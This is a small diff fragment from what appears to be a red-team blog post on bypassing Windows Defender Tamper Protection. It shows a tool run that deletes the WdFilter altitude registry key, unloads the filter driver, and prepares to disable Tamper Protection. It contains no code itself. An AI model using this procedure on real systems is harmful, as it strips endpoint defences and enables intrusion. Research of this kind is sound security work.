m3rcer/m3rcer.github.io/_posts/redteaming/Bypass-Tamper-Protection/2024-04-10-Disable_Tamper_Protection_Bypass.md

 [+] Restart the system or wait a few minutes for WdFilter to unload.
 [+] Execute option 1 to validate!

-# Restart or wait a few minutes to crash and unload WdFilter
+# Restart to crash and unload WdFilter
 C:\Users\User\Desktop>.\Disable-TamperProtection.exe 1
 [+] WdFilter Altitude Registry key has been successfully deleted.
 [+] WDFilter has been successfully unloaded, use option 2 to disable Tamper Protection.